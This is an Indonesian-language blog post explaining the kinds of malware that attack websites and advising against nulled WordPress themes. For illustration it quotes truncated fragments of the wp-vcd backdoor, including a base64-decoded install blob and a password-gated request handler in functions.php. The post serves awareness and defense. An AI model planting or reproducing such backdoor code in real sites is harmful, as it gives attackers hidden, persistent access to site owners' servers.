Penasaran Bagaimana Website Terserang Malware? Simak Penjelasan Berikut! - IDS Digital College

Penasaran Bagaimana Website Terserang Malware? Simak Penjelasan Berikut!

Di era teknologi yang semakin canggih seperti ini, jangan sampai membuat kita lengah dalam urusan keamanan. Nyatanya, hingga kini kejahatan dunia maya atau ancaman siber begitu berbahaya dan dapat menyerang siapa saja. Terutama bagi yang memiliki website, baik untuk kepentingan bisnis atau pribadi. Bisa saja situs milikmu mendapat serangan malware. Kalau kamu masih merasa asing dengan istilah malware, dapat menyimak informasi singkat berikut.

 

Pengertian Malware

Malware merupakan singkatan dari Malicious Software, yaitu sebuah software yang dirancang dengan tujuan untuk membahayakan, menyusup, atau merusak sebuah sistem, baik pada komputer atau website. Biasanya peretas melakukan aksinya melalui bantuan jaringan internet. Sebelum mencari tahu bagaimana website dapat diserang malware, kamu harus mengetahui jenis-jenisnya terlebih dulu, di antaranya:

 

 

  • Backdoor

 

Backdoor adalah jenis malware yang “bersarang” pada website. Kebanyakan peretas menggunakan script shell-backdoor dan ditanam oleh peretas yang sudah berhasil masuk ke website-mu dan membuat “pintu belakang” sehingga website-mu bisa diakses si peretas kapan saja tanpa disadari.

 

 

  • PopUp Ads Malware

 

Malware jenis ini biasanya kamu jumpai kalau kamu sering menggunakan tema atau plugin nulled (free) yang didapat dari website tidak resmi. Kamu akan menemukan iklan yang tiba-tiba muncul di website meskipun kamu tidak memonetisasi website dengan Google Ads. Ini termasuk jenis malware injected, yaitu infeksi virus berasal dari script-nya sehingga ketika di-deploy di website, malware tersebut akan bekerja secara otomatis.

 

 

  • Spamming

 

Spamming menjadi salah satu jenis malware yang kerap menimpa pengguna website. Jika salah satu akun email yang terdaftar di akun hosting-mu sudah diretas, maka hacker bisa mengirimkan banyak email ke berbagai akun yang berbeda-beda dalam jumlah yang banyak.

 

 

  • Ransomware

 

Jenis Ransomware biasanya melakukan denying access atau penolakan akses ke komputer yang terkena malware ini. Korban yang terkena bisa diminta untuk mengirimkan sejumlah uang dalam bentuk dollar atau bitcoin untuk menebus data-data dalam komputer mereka yang dikunci oleh peretas, termasuk pula data pada website.

 

 

  • Phishing

 

Masuk ke dalam golongan berbahaya karena malware jenis Phising bisa dipakai untuk scamming atau penipuan yang mampu mencuri data pengguna. Contoh dari phising, seperti halaman login ke internet banking dengan menampilkan formulir login yang sebenarnya bukan berasal dari bank resmi.

 

 

  • Botnet Attack

 

Sedikit berbeda dari beberapa malware yang telah disebutkan, cara kerja Botnet Attack melakukan serangan seperti DDos, yaitu menyebarkan malware ke website lain, termasuk spam dan scam. Serangan ini bekerja dengan sebuah script yang tertanam di server serta menggunakan cronjob sehingga Botnet dapat berjalan otomatis sesuai waktu yang diatur pada Cronjob.

 

Cara Kerja Malware dalam Menyerang Website

Sebenarnya ada banyak penyebab website milikmu dapat diserang malware, salah satunya jika menggunakan CMS WordPress saat mengunduh tema dari website yang tidak resmi. Tidak sedikit dari situs-situs tidak resmi yang sudah ter-inject script malware. Contoh dari script malware yaitu script wp-vcd.php, yang isinya seperti:

$install_code = ‘c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[…..] $install_hash = md5($_SERVER[‘HTTP_HOST’] . AUTH_SALT); $install_code = str_replace(‘{$PASSWORD}’ , $install_hash, base64_decode( $install_code ));

Selain itu juga ada functions.php pada directory themes yang digunakan. Kamu bisa melihat bahwa script berikut terhubung ke wp-vcd.php.

<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘f98cd901d7551a69caf41ba758a7c972’))

{

$div_code_name=”wp_vcd”;

switch ($_REQUEST[‘action’])

{

[……]

$div_code_name = “wp_vcd”;

$funcfile      = __FILE__;

if(!function_exists(‘theme_temp_setup’)) {

$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];

if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

 

Setelah kamu mengerti bagaimana website diserang malware, yang harus dilakukan adalah berhati-hati dan lebih waspada akan adanya ancaman siber dari peretas. Hindari juga untuk mengunduh file apapun termasuk tema dari website tidak resmi. Selain itu, gunakan cyber security Indonesia yang terpercaya.

Posted in: News


error

Enjoy this blog? Please spread the word :)

WhatsApp chat